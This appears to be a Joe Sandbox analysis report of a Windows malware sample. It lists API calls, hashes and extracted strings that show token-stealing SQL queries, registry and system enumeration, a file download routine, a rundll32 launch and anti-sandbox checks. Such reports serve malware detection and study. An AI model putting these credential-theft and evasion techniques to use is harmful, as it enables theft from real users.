                                                                                                                                                        • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00405E2F
                                                                                                                                                        • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00405E53
                                                                                                                                                        • InternetReadFile.WININET(00410E73,?,00000400,?), ref: 00405E7C
                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00405EAA
                                                                                                                                                        • FindCloseChangeNotification.KERNEL32(?,?,00000400), ref: 00405EE9
                                                                                                                                                        • InternetCloseHandle.WININET(00410E73), ref: 00405EF3
                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00405F00
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Internet$CloseFile$HandleOpen$ChangeCrackCreateFindNotificationReadWritelstrcpylstrlen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 729276229-0
                                                                                                                                                        • Opcode ID: 2c33a23298cca61dfdaeee40ce65a6995c68276a218cce1f1fd24f42d4950647
                                                                                                                                                        • Instruction ID: 46018c2d0393d599e49b8942d3c4f4431f3cc1562104312217daf3d911a1fc92
                                                                                                                                                        • Opcode Fuzzy Hash: 2c33a23298cca61dfdaeee40ce65a6995c68276a218cce1f1fd24f42d4950647
                                                                                                                                                        • Instruction Fuzzy Hash: DB514471A00618ABDB20DF51CC45BEF7779EB44305F1081AAB645B71C0DB78AB85CF99
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • ??_U@YAPAXI@Z.MSVCRT ref: 00413D9E
                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                        • OpenProcess.KERNEL32(001FFFFF,00000000,00413FCD,0041D28B), ref: 00413DDC
                                                                                                                                                        • memset.MSVCRT ref: 00413E2A
                                                                                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00413F7E
                                                                                                                                                        Strings
                                                                                                                                                        • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00413E4C
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: OpenProcesslstrcpymemset
                                                                                                                                                        • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                                                                                                                                        • API String ID: 224852652-4138519520
                                                                                                                                                        • Opcode ID: bdd97628f29c753fecfde2c83a5401364cfafbcd459e9bc7d3d7e6f311fbbc6e
                                                                                                                                                        • Instruction ID: ba4a912f34a6ab240f03399ec897c117189ceb9282cc0eaf369c81769a73d46f
                                                                                                                                                        • Opcode Fuzzy Hash: bdd97628f29c753fecfde2c83a5401364cfafbcd459e9bc7d3d7e6f311fbbc6e
                                                                                                                                                        • Instruction Fuzzy Hash: 35513DB0D003189BDB24EF51DC45BEEBB75AB48309F5041AEE11966281DB386BC9CF58
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                          • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                          • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                          • Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
                                                                                                                                                          • Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
                                                                                                                                                          • Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E
                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 0040B44D
                                                                                                                                                          • Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552
                                                                                                                                                        • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040B47B
                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 0040B553
                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 0040B567
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcpylstrlen$AllocLocallstrcat$memcmpmemset
                                                                                                                                                        • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                                                                                                                                        • API String ID: 2910778473-1079375795
                                                                                                                                                        • Opcode ID: d6f8aa2c73c68f92a0e58bbbfc20920170efd5a28ce5b04736f5b5a1e9792500
                                                                                                                                                        • Instruction ID: df2f8e8a8ca21c55da42a3c6f19f5118b3684059388f817d0631ea5bb79e5354
                                                                                                                                                        • Opcode Fuzzy Hash: d6f8aa2c73c68f92a0e58bbbfc20920170efd5a28ce5b04736f5b5a1e9792500
                                                                                                                                                        • Instruction Fuzzy Hash: 07A164759102089BCF14FBA1DC52EEE7739BF54308F51416EF506B2191EF38AA85CBA8
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,043129A0), ref: 00415F11
                                                                                                                                                          • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04312928), ref: 00415F2A
                                                                                                                                                          • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,043128E0), ref: 00415F42
                                                                                                                                                          • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,043128F8), ref: 00415F5A
                                                                                                                                                          • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04312910), ref: 00415F73
                                                                                                                                                          • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,0432E3B8), ref: 00415F8B
                                                                                                                                                          • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04314538), ref: 00415FA3
                                                                                                                                                          • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04314478), ref: 00415FBC
                                                                                                                                                          • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04330228), ref: 00415FD4
                                                                                                                                                          • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04330300), ref: 00415FEC
                                                                                                                                                          • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,043301E0), ref: 00416005
                                                                                                                                                          • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04330180), ref: 0041601D
                                                                                                                                                          • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,043143D8), ref: 00416035
                                                                                                                                                          • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,043303C0), ref: 0041604E
                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                          • Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011D1
                                                                                                                                                          • Part of subcall function 00401120: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004136D7,0041D6E3), ref: 0040112A
                                                                                                                                                          • Part of subcall function 00401120: ExitProcess.KERNEL32 ref: 0040113E
                                                                                                                                                          • Part of subcall function 004010D0: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,004136DC), ref: 004010EB
                                                                                                                                                          • Part of subcall function 004010D0: VirtualAllocExNuma.KERNEL32(00000000,?,?,004136DC), ref: 004010F2
                                                                                                                                                          • Part of subcall function 004010D0: ExitProcess.KERNEL32 ref: 00401103
                                                                                                                                                          • Part of subcall function 004011E0: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004011FE
                                                                                                                                                          • Part of subcall function 004011E0: __aulldiv.LIBCMT ref: 00401218
                                                                                                                                                          • Part of subcall function 004011E0: __aulldiv.LIBCMT ref: 00401226
                                                                                                                                                          • Part of subcall function 004011E0: ExitProcess.KERNEL32 ref: 00401254
                                                                                                                                                          • Part of subcall function 00413430: GetUserDefaultLangID.KERNEL32(?,?,004136E6,0041D6E3), ref: 00413434
                                                                                                                                                        • GetUserDefaultLangID.KERNEL32 ref: 004136E6
                                                                                                                                                          • Part of subcall function 00401150: ExitProcess.KERNEL32 ref: 00401186
                                                                                                                                                          • Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,043306D0,004136EB,0041D6E3), ref: 004143CD
                                                                                                                                                          • Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
                                                                                                                                                          • Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC
                                                                                                                                                          • Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
                                                                                                                                                          • Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
                                                                                                                                                          • Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C
                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0432E458,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 0041378A
                                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004137A8
                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004137B9
                                                                                                                                                        • Sleep.KERNEL32(00001770), ref: 004137C4
                                                                                                                                                        • CloseHandle.KERNEL32(?,00000000,?,0432E458,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 004137DA
                                                                                                                                                        • ExitProcess.KERNEL32 ref: 004137E2
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleLangName__aulldiv$ComputerCreateCurrentGlobalInfoMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1125299040-0
                                                                                                                                                        • Opcode ID: 347c744c57bb489da1d20327baf5dbd504a16fe07c4081f8531455d2c5727875
                                                                                                                                                        • Instruction ID: 0037ec1138340b95bb434dc328289296f16cab3c571637fdb93d627daa89b4d0
                                                                                                                                                        • Opcode Fuzzy Hash: 347c744c57bb489da1d20327baf5dbd504a16fe07c4081f8531455d2c5727875
                                                                                                                                                        • Instruction Fuzzy Hash: 7E318270A00204AADB04FBF2DC56BEE7779AF08708F10451EF112A61D2DF789A85C7AD
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
                                                                                                                                                        • wsprintfA.USER32 ref: 00414BF6
                                                                                                                                                        • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00414C29
                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00414C36
                                                                                                                                                          • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                        • RegQueryValueExA.KERNEL32(00000000,04336648,00000000,000F003F,?,00000400), ref: 00414C89
                                                                                                                                                        • lstrlen.KERNEL32(?), ref: 00414C9E
                                                                                                                                                        • RegQueryValueExA.KERNEL32(00000000,043367C8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,0041D4B4), ref: 00414D36
                                                                                                                                                        • RegCloseKey.KERNEL32(00000000), ref: 00414DA5
                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00414DB7
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                                                                                                                                        • String ID: %s\%s
                                                                                                                                                        • API String ID: 3896182533-4073750446
                                                                                                                                                        • Opcode ID: 8ab0f01d07d0afedc2f6091183216f607dc1c33232ff2026bfdf8348589bd1d2
                                                                                                                                                        • Instruction ID: d244d91c33a18a5b0a6d9a0a642cdc181f43283702d6765b4fd500d7f5e12fa2
                                                                                                                                                        • Opcode Fuzzy Hash: 8ab0f01d07d0afedc2f6091183216f607dc1c33232ff2026bfdf8348589bd1d2
                                                                                                                                                        • Instruction Fuzzy Hash: 59213875A0021CABDB64CB50DC85FE973B9BF88300F0085D9A649A6180DF74AAC6CFE4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 00411DA5
                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000001,04336F50,00000000,00020119,?), ref: 00411DC4
                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,043388A8,00000000,00000000,00000000,000000FF), ref: 00411DE8
                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00411DF2
                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 00411E17
                                                                                                                                                        • lstrcat.KERNEL32(?,04338710), ref: 00411E2B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcat$CloseOpenQueryValuememset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2623679115-0
                                                                                                                                                        • Opcode ID: bf11c5f64fb992b3c772fe614ac28ac6fc491ab679ab64900ab2a626250608f3
                                                                                                                                                        • Instruction ID: 8aed71b150b2ed53c6c52757a29982c6d8c6785b9d22af2673d92710ece34b21
                                                                                                                                                        • Opcode Fuzzy Hash: bf11c5f64fb992b3c772fe614ac28ac6fc491ab679ab64900ab2a626250608f3
                                                                                                                                                        • Instruction Fuzzy Hash: F641B4B2900108BBCB15EBE0DC86FEE733EAB88745F00454DF71A5A191EE7467848BE1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                          • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,043378D8,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                                                                          • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                          • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00409BB1
                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 00409F6A
                                                                                                                                                          • Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
                                                                                                                                                          • Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
                                                                                                                                                          • Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E
                                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000), ref: 00409CAD
                                                                                                                                                        • DeleteFileA.KERNEL32(00000000), ref: 00409FEB
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcpy$lstrlen$Filelstrcat$AllocCopyDeleteLocalSystemTimememcmpmemset
                                                                                                                                                        • String ID: X@
                                                                                                                                                        • API String ID: 3258613111-2850556465
                                                                                                                                                        • Opcode ID: a8e0db1d6ef1a99a5c6703875a911b59b2c791a67ea3088ef4958de5150a2a16
                                                                                                                                                        • Instruction ID: 70962d3f4e1e977daa55f2855abdfba287f36735b870bb76fdd61a7d9847a281
                                                                                                                                                        • Opcode Fuzzy Hash: a8e0db1d6ef1a99a5c6703875a911b59b2c791a67ea3088ef4958de5150a2a16
                                                                                                                                                        • Instruction Fuzzy Hash: BCD10376D101089ACB14FBA5DC91EEE7739BF14304F51825EF51672091EF38AA89CBB8
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                          • Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                          • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                          • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                          • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,043378D8,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                                                                        • ShellExecuteEx.SHELL32(0000003C), ref: 00411307
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcpy$lstrcat$ExecuteFolderPathShellSystemTimelstrlen
                                                                                                                                                        • String ID: "" $.dll$<$C:\Windows\system32\rundll32.dll
                                                                                                                                                        • API String ID: 672783590-3078973353
                                                                                                                                                        • Opcode ID: 8bf581271a99245cbe763f15856ee47378d6d56aa465237988ebd28fe15ceb26
                                                                                                                                                        • Instruction ID: ff393b419b3d9cd89bf84e2a65158e8723a283ad60ef2a05342f0777a40cb69c
                                                                                                                                                        • Opcode Fuzzy Hash: 8bf581271a99245cbe763f15856ee47378d6d56aa465237988ebd28fe15ceb26
                                                                                                                                                        • Instruction Fuzzy Hash: 19A124759101089ACB15FB91DC92FDEB739AF14304F51425FE10666095EF38ABCACFA8
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • lstrcat.KERNEL32(?,04336990), ref: 0041244B
                                                                                                                                                          • Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 00412471
                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 00412490
                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 004124A4
                                                                                                                                                        • lstrcat.KERNEL32(?,0432F450), ref: 004124B7
                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 004124CB
                                                                                                                                                        • lstrcat.KERNEL32(?,043371D0), ref: 004124DF
                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                          • Part of subcall function 00415490: GetFileAttributesA.KERNEL32(00000000,?,0040E9F4,?,00000000,?,00000000,0041D76E,0041D76B), ref: 0041549F
                                                                                                                                                          • Part of subcall function 004121F0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00412200
                                                                                                                                                          • Part of subcall function 004121F0: HeapAlloc.KERNEL32(00000000), ref: 00412207
                                                                                                                                                          • Part of subcall function 004121F0: wsprintfA.USER32 ref: 00412223
                                                                                                                                                          • Part of subcall function 004121F0: FindFirstFileA.KERNEL32(?,?), ref: 0041223A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_u3bs.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 167551676-0
                                                                                                                                                        • Opcode ID: 9316919b2ae84fd87c37e37ff305c137bc980bc565c5ec5aca0636d12a2c7ed7
                                                                                                                                                        • Instruction ID: 26a05e4f659b4c4b868bb0234a0ad995871bbc4a3af1f84cd303f322fad0653f
                                                                                                                                                        • Opcode Fuzzy Hash: 9316919b2ae84fd87c37e37ff305c137bc980bc565c5ec5aca0636d12a2c7ed7
                                                                                                                                                        • Instruction Fuzzy Hash: 083164B6900608A7CB20FBB0DC95EE9773DAB48704F40458EB3469A051EA7897C8CFD8
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004011FE
                                                                                                                                                        • __aulldiv.LIBCMT ref: 00401218
                                                                                                                                                        • __aulldiv.LIBCMT ref: 00401226
                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00401254
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
